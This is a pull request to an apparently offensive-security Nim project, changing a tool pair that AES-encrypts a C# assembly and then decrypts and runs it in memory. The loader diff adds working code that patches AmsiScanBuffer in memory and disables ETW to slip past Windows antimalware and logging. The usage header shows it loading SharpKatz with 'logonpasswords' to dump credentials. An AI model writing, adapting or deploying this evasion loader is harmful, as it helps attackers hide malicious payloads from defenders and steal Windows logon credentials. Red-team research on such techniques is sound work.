### PR TITLE
Modify Nim encrypting loader

### DIFF
--- a/nim/encrypt_assembly.nim
+++ b/nim/encrypt_assembly.nim
@@ -1,43 +1,64 @@
+#[
+    Authors: Marcello Salvati (@byt3bl33d3r), @S3cur3Th1sSh1t, @snovvcrash
+    License: BSD 3-Clause
+    References:
+      - https://github.com/khchen/winim/blob/master/examples/clr/usage_demo2.nim
+      - https://github.com/byt3bl33d3r/OffensiveNim
+
+    Usage:
+      Cmd > nim c encrypt_assembly.nim
+      Cmd > nim c encrypted_assembly_loader.nim
+      Cmd > .\encrypt_assembly.exe <PASSWORD> <CSHARP_BINARY.EXE> <ENCRYPTED_B64.TXT>
+      Cmd > .\encrypted_assembly_loader.exe <PASSWORD> <ENCRYPTED_B64.TXT> [ARG1] [ARG1] ...
+
+    Example with https://github.com/b4rtik/SharpKatz:
+      Cmd > .\encrypt_assembly.exe Passw0rd! SharpKatz.exe sharpkatz.txt
+      Cmd > .\encrypted_assembly_loader.exe Passw0rd! sharpkatz.txt --Command logonpasswords
+]#
+
+import os
+import strformat
+import base64
 import nimcrypto
 import nimcrypto/sysrand
-import base64
-import os
-import strutils
+
 
 func toByteSeq*(str: string): seq[byte] {.inline.} =
-  ## Converts a string to the corresponding byte sequence.
-  @(str.toOpenArrayByte(0, str.high))
+    # Converts a string to the corresponding byte sequence
+    @(str.toOpenArrayByte(0, str.high))
 
-# read file from argument
-let entireFile = readFile(paramStr(1))
+
+let
+    password: string = paramStr(1)
+    inFile: string = paramStr(2)
+    outFile: string = paramStr(3)
 
 var
-    data: seq[byte] = toByteSeq(entireFile)
-    envkey: string = "TARGETDOMAIN"
-
-    ectx, dctx: CTR[aes256]
+    inFileContents: string = readFile(inFile)
+    plaintext: seq[byte] = toByteSeq(inFileContents)
+    ectx: CTR[aes256]
     key: array[aes256.sizeKey, byte]
     iv: array[aes256.sizeBlock, byte]
-    plaintext = newSeq[byte](len(data))
-    enctext = newSeq[byte](len(data))
-    dectext = newSeq[byte](len(data))
+    encrypted: seq[byte] = newSeq[byte](len(plaintext))
 
 # Set static IV
 iv = [byte 183, 142, 238, 156, 42, 43, 248, 100, 125, 249, 192, 254, 217, 222, 133, 149]
 
-copyMem(addr plaintext[0], addr data[0], len(data))
+copyMem(addr plaintext[0], addr plaintext[0], len(plaintext))
 
 # Expand key to 32 bytes using SHA256 as the KDF
-var expandedkey = sha256.digest(envkey)
-copyMem(addr key[0], addr expandedkey.data[0], len(expandedkey.data))
+var expandedKey = sha256.digest(password)
+copyMem(addr key[0], addr expandedKey.data[0], len(expandedKey.data))
+
+echo fmt"[*] Encrypting {inFile} binary using password: {password}"
 
 ectx.init(key, iv)
-ectx.encrypt(plaintext, enctext)
+ectx.encrypt(plaintext, encrypted)
 ectx.clear()
 
-#base64 encode encrypted assembly
-let encodedcrypted = encode(enctext)
+# Base64 encode encrypted assembly
+let encodedCrypted = encode(encrypted)
 
-echo "Writing encrypted base64 encoded assembly to: enc.txt "
+echo fmt"[*] Writing encrypted base64 encoded assembly to: {outFile}"
 
-writeFile("enc.txt", encodedcrypted)
+writeFile(outFile, encodedCrypted)

--- a/nim/encrypt_assembly.nim
+++ b/nim/encrypt_assembly.nim
@@ -44,8 +44,6 @@ var
 # Set static IV
 iv = [byte 183, 142, 238, 156, 42, 43, 248, 100, 125, 249, 192, 254, 217, 222, 133, 149]
 
-copyMem(addr plaintext[0], addr plaintext[0], len(plaintext))
-
 # Expand key to 32 bytes using SHA256 as the KDF
 var expandedKey = sha256.digest(password)
 copyMem(addr key[0], addr expandedKey.data[0], len(expandedKey.data))

--- a/nim/encrypted_assembly_loader.nim
+++ b/nim/encrypted_assembly_loader.nim
@@ -72,7 +72,7 @@ proc BlockETW(): bool =
     # Disable ETW via https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/
     var cometw: string = "COMPlus_ETWEnabled"
     var setnull: string = "0"
-    putenv(cometw,setnull)
+    putenv(cometw, setnull)
     return true
 
 
@@ -101,8 +101,6 @@ var
 
 # Create Random IV
 iv = [byte 183, 142, 238, 156, 42, 43, 248, 100, 125, 249, 192, 254, 217, 222, 133, 149]
-
-copyMem(addr encrypted[0], addr encrypted[0], len(encrypted))
 
 # Expand key to 32 bytes using SHA256 as the KDF
 var expandedKey = sha256.digest(password)

--- a/nim/encrypted_assembly_loader.nim
+++ b/nim/encrypted_assembly_loader.nim
@@ -1,46 +1,123 @@
-import winim/clr except `[]`
-import sugar
+#[
+    Authors: Marcello Salvati (@byt3bl33d3r), @S3cur3Th1sSh1t, @snovvcrash
+    License: BSD 3-Clause
+    References:
+      - https://github.com/khchen/winim/blob/master/examples/clr/usage_demo2.nim
+      - https://github.com/byt3bl33d3r/OffensiveNim
+
+    Usage:
+      Cmd > nim c encrypt_assembly.nim
+      Cmd > nim c encrypted_assembly_loader.nim
+      Cmd > .\encrypt_assembly.exe <PASSWORD> <CSHARP_BINARY.EXE> <ENCRYPTED_B64.TXT>
+      Cmd > .\encrypted_assembly_loader.exe <PASSWORD> <ENCRYPTED_B64.TXT> [ARG1] [ARG1] ...
+
+    Example with https://github.com/b4rtik/SharpKatz:
+      Cmd > .\encrypt_assembly.exe Passw0rd! SharpKatz.exe sharpkatz.txt
+      Cmd > .\encrypted_assembly_loader.exe Passw0rd! sharpkatz.txt --Command logonpasswords
+]#
+
 import os
-import winim/lean
 import strformat
 import dynlib
 import base64
-import streams
+import winim/clr except `[]`
+import winim/lean
 import nimcrypto
 import nimcrypto/sysrand
 
-var encoded = "base64encodedencryptedassembly"
+let
+    usePatchAmsi = false
+    useBlockETW = false
+    password: string = paramStr(1)
+    inFile: string = paramStr(2)
+
+when defined amd64:
+    echo "[*] Running in x64 process"
+    const patch: array[6, byte] = [byte 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3]
+elif defined i386:
+    echo "[*] Running in x86 process"
+    const patch: array[8, byte] = [byte 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00]
+
+
+proc PatchAmsi(): bool =
+    var
+        amsi: LibHandle
+        cs: pointer
+        op: DWORD
+        t: DWORD
+        disabled: bool = false
+
+    # loadLib does the same thing that the dynlib pragma does and is the equivalent of LoadLibrary() on windows
+    # it also returns nil if something goes wrong meaning we can add some checks in the code to make sure everything's ok (which you can't really do well when using LoadLibrary() directly through winim)
+    amsi = loadLib("amsi")
+    if isNil(amsi):
+        echo "[X] Failed to load amsi.dll"
+        return disabled
+
+    cs = amsi.symAddr("AmsiScanBuffer") # equivalent of GetProcAddress()
+    if isNil(cs):
+        echo "[X] Failed to get the address of 'AmsiScanBuffer'"
+        return disabled
+
+    if VirtualProtect(cs, patch.len, 0x40, addr op):
+        echo "[*] Applying AMSI patch"
+        copyMem(cs, unsafeAddr patch, patch.len)
+        VirtualProtect(cs, patch.len, op, addr t)
+        disabled = true
+
+    return disabled
+
+
+proc BlockETW(): bool =
+    # Disable ETW via https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/
+    var cometw: string = "COMPlus_ETWEnabled"
+    var setnull: string = "0"
+    putenv(cometw,setnull)
+    return true
+
 
 func toByteSeq*(str: string): seq[byte] {.inline.} =
-  ## Converts a string to the corresponding byte sequence.
-  @(str.toOpenArrayByte(0, str.high))
+    # Converts a string to the corresponding byte sequence
+    @(str.toOpenArrayByte(0, str.high))
+
+
+when isMainModule:
+    if usePatchAmsi == true:
+        var patchAmsiSuccess: bool = PatchAmsi()
+        echo fmt"[*] AMSI disabled: {bool(patchAmsiSuccess)}"
+
+when isMainModule:
+    if useBlockETW == true:
+        var blockETWSuccess: bool = BlockETW()
+        echo fmt"[*] ETW blocked: {bool(blockETWSuccess)}"
 
 var
-    envkey: string = "TARGETDOMAIN"
+    inFileContents: string = readFile(inFile)
+    encrypted: seq[byte] = toByteSeq(decode(inFileContents))
     dctx: CTR[aes256]
     key: array[aes256.sizeKey, byte]
     iv: array[aes256.sizeBlock, byte]
-    # HelloWorld Encrypted
-    enctext: seq[byte] = toByteSeq(decode(encoded))
-    dectext = newSeq[byte](len(enctext))
+    decrypted: seq[byte] = newSeq[byte](len(encrypted))
 
 # Create Random IV
 iv = [byte 183, 142, 238, 156, 42, 43, 248, 100, 125, 249, 192, 254, 217, 222, 133, 149]
 
-copyMem(addr enctext[0], addr enctext[0], len(enctext))
+copyMem(addr encrypted[0], addr encrypted[0], len(encrypted))
 
 # Expand key to 32 bytes using SHA256 as the KDF
-var expandedkey = sha256.digest(envkey)
-copyMem(addr key[0], addr expandedkey.data[0], len(expandedkey.data))
+var expandedKey = sha256.digest(password)
+copyMem(addr key[0], addr expandedKey.data[0], len(expandedKey.data))
+
+echo fmt"[*] Decrypting {inFile} using password: {password}"
 
 dctx.init(key, iv)
-dctx.decrypt(enctext, dectext)
+dctx.decrypt(encrypted, decrypted)
 dctx.clear()
 
-var assembly = load(dectext)
+var assembly = load(decrypted)
 
 var cmd: seq[string]
-var i = 1
+var i = 3
 while i <= paramCount():
     cmd.add(paramStr(i))
     inc(i)


### PR DESCRIPTION
In this PR I would like to bring the following changes:

* Merge examples from @byt3bl33d3r’s [gist](https://gist.github.com/byt3bl33d3r/57fe809946b897110e3f5a8eb4a44fd2) and @S3cur3Th1sSh1t’s [gist](https://gist.github.com/S3cur3Th1sSh1t/06733ce759fe8844fc2ce7b3c609bfd5) to combine payload encryption with the ability to enable/disable AMSI patching and block ETW – edit `usePatchAmsi` and `useBlockETW` variables in the loader code.
* Add more CLI arguments in order to set password and input/output files without having to recompile the code – see usage examples in header comments.
